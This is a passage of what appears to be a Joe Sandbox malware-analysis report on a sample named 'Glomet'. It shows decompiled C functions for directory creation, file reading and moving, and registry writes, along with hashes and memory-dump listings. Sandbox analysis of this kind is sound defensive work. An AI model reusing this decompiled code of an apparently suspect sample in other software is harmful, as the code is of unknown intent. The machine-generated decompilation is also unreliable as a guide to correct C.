                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                              • Instruction ID: 1444cfec4ca9bf1d34442b2169c12043b22736e773fd5239433e8f32ad8d098d
                                                                                                                                                                              • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD0C972504421ABC6112728EE0C89BBB55DB54271702CA36FDA5A26B1DB304C569A98
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004058BB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004058BB(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                              0x004058c1
                                                                                                                                                                              0x004058c9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004058cf
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                              • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                                                              • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                                                                                                                                              • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                                                              • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402675 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402675(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402C17(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x38)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t38 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E004061CE(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405E62( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E004061B5(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *(_t38 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}







                                                                                                                                                                              0x00402675
                                                                                                                                                                              0x00402677
                                                                                                                                                                              0x0040267a
                                                                                                                                                                              0x0040267f
                                                                                                                                                                              0x00402683
                                                                                                                                                                              0x00402686
                                                                                                                                                                              0x00402689
                                                                                                                                                                              0x00402ac5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x0040268f
                                                                                                                                                                              0x0040268f
                                                                                                                                                                              0x00402696
                                                                                                                                                                              0x00402698
                                                                                                                                                                              0x00402698
                                                                                                                                                                              0x0040269d
                                                                                                                                                                              0x00402725
                                                                                                                                                                              0x00402725
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026a3
                                                                                                                                                                              0x004026a4
                                                                                                                                                                              0x004026af
                                                                                                                                                                              0x004026b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026b4
                                                                                                                                                                              0x004026b4
                                                                                                                                                                              0x004026b7
                                                                                                                                                                              0x004026b7
                                                                                                                                                                              0x004026c0
                                                                                                                                                                              0x004026c7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026cc
                                                                                                                                                                              0x004026f5
                                                                                                                                                                              0x004026ce
                                                                                                                                                                              0x004026d2
                                                                                                                                                                              0x004026ff
                                                                                                                                                                              0x00402705
                                                                                                                                                                              0x0040271d
                                                                                                                                                                              0x0040270f
                                                                                                                                                                              0x0040270f
                                                                                                                                                                              0x00402712
                                                                                                                                                                              0x00402712
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026da
                                                                                                                                                                              0x004026da
                                                                                                                                                                              0x004026dd
                                                                                                                                                                              0x004026e0
                                                                                                                                                                              0x004026e3
                                                                                                                                                                              0x004026e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026e8
                                                                                                                                                                              0x004026eb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026ed
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026ed
                                                                                                                                                                              0x004026eb
                                                                                                                                                                              0x004026e6
                                                                                                                                                                              0x004026d2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004026cc
                                                                                                                                                                              0x00402728
                                                                                                                                                                              0x00402728
                                                                                                                                                                              0x004015b0
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004015b0
                                                                                                                                                                              0x004026b2
                                                                                                                                                                              0x0040269d
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: wsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2111968516-0
                                                                                                                                                                              • Opcode ID: 6b5af3765d5cf1b9f9f07b52c59eceaec621cd2aaca7de2b2ca3f3db680138bc
                                                                                                                                                                              • Instruction ID: de37bab72e455a498a4ff469eb517d64d021eea917781b3042bf3297e0f4bfdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b5af3765d5cf1b9f9f07b52c59eceaec621cd2aaca7de2b2ca3f3db680138bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 5221F730C04289BEDF328F9886485AEBBB49F45314F14447FE491B73D1D6BD8A85CB2A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                              			E0040166A() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C39(0xffffffd0);
				_t16 = E00402C39(0xffffffdf);
				E00402C39(0x13);
				_t7 = MoveFileA(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004065CE(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406030(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                                                                                                                                              0x00401673
                                                                                                                                                                              0x0040167c
                                                                                                                                                                              0x0040167e
                                                                                                                                                                              0x00401685
                                                                                                                                                                              0x0040168d
                                                                                                                                                                              0x00401699
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004016ad
                                                                                                                                                                              0x004016af
                                                                                                                                                                              0x004016b4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004016b4
                                                                                                                                                                              0x0040168f
                                                                                                                                                                              0x0040168f
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileMove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3562171763-0
                                                                                                                                                                              • Opcode ID: f315d12e12ef7a2c5b0005b3520eeb34d1e5de220c17f338371428510616054a
                                                                                                                                                                              • Instruction ID: 86c8250a8eaca220701d655684c56ae394e352fbac7a718e03cec18255673dc0
                                                                                                                                                                              • Opcode Fuzzy Hash: f315d12e12ef7a2c5b0005b3520eeb34d1e5de220c17f338371428510616054a
                                                                                                                                                                              • Instruction Fuzzy Hash: EFF09631618124A7DB206BB54F4DE5F12A48B51379B24063FF011B21D0DAFD850155AF
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040239B Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040239B(void* __ecx, void* __edx, signed int* __edi) {
				void* _t13;

				 *__edi =  *__edi & 0x000000f4;
				 *0xf4 =  *0xf4 + 0xf4;
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}




                                                                                                                                                                              0x004023a0
                                                                                                                                                                              0x004023a2
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                                              • Opcode ID: d626627cbd6b652d474c84542a43e6e56583ab8881f8c4b4047e74021ad6b779
                                                                                                                                                                              • Instruction ID: 283275a52edd010614121f365ad7e92e903c30a389c438d95b9ec19b8cf14ce9
                                                                                                                                                                              • Opcode Fuzzy Hash: d626627cbd6b652d474c84542a43e6e56583ab8881f8c4b4047e74021ad6b779
                                                                                                                                                                              • Instruction Fuzzy Hash: 25E09B31604269ABE7203EF15E8E9BF22A4DB80314B25053BFA41B61C2D9FC4C4347AD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402733 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                              			E00402733(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402C17(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x38)) = _t14;
					_t9 = SetFilePointer(E004061CE(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
						E004061B5();
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                                                                                                                              0x00402733
                                                                                                                                                                              0x00402733
                                                                                                                                                                              0x00402734
                                                                                                                                                                              0x0040273c
                                                                                                                                                                              0x00402741
                                                                                                                                                                              0x00402742
                                                                                                                                                                              0x00402751
                                                                                                                                                                              0x0040275a
                                                                                                                                                                              0x00402760
                                                                                                                                                                              0x00402a42
                                                                                                                                                                              0x00402a42
                                                                                                                                                                              0x0040275a
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402751
                                                                                                                                                                                • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                                                              • Opcode ID: 4ca417089e649987262dda3cab944978d0a97590f239ea9c21da6aeac4edae52
                                                                                                                                                                              • Instruction ID: a132023e33ce3b2274f2a3cc1c924ae45bed6fe67fe9b9d7ffa32cf729765a6a
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca417089e649987262dda3cab944978d0a97590f239ea9c21da6aeac4edae52
                                                                                                                                                                              • Instruction Fuzzy Hash: B1E09271A00104BED710EB94AE89CAE7778DB84314B64043BF102F50C1DA7848518A3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040610B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                              0x00406115
                                                                                                                                                                              0x0040611e
                                                                                                                                                                              0x00406134
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406134
                                                                                                                                                                              0x00406122
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CEA,00000000,?,?), ref: 00406134
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                              • Instruction ID: f3dc4abaab06895e066b0b710936ca54da7b1f8b7a25aa4512e4b4def2a222e8
                                                                                                                                                                              • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                              • Instruction Fuzzy Hash: BAE0E672110209BEEF195F50DC0AD7B371DEB14314F01452EF947D4091E6B5A9305634
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040171F() {
				long _t5;
				CHAR* _t8;
				CHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathA(_t8, E00402C39(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                                                                                                                                              0x00401733
                                                                                                                                                                              0x00401739
                                                                                                                                                                              0x0040173b
                                                                                                                                                                              0x0040279c
                                                                                                                                                                              0x004027a3
                                                                                                                                                                              0x004027a3
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PathSearch
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2203818243-0
                                                                                                                                                                              • Opcode ID: 374c22ba7daa04feaf9921462dea6aa1bbd67497b7e3e3c267911b64cd111e0b
                                                                                                                                                                              • Instruction ID: ca2d9b39537dad7175a5f2bb677baa4b1f6d657c0aa67d91cc455ca62d690c78
                                                                                                                                                                              • Opcode Fuzzy Hash: 374c22ba7daa04feaf9921462dea6aa1bbd67497b7e3e3c267911b64cd111e0b
                                                                                                                                                                              • Instruction Fuzzy Hash: 89E0DF72304200ABE720CF649E49EAB37A8CB50368B30453AB201B60C1E6B899058A3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E62(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                              0x00405e66
                                                                                                                                                                              0x00405e76
                                                                                                                                                                              0x00405e7e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405e85
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405e87

                                                                                                                                                                              APIs
                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403368,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
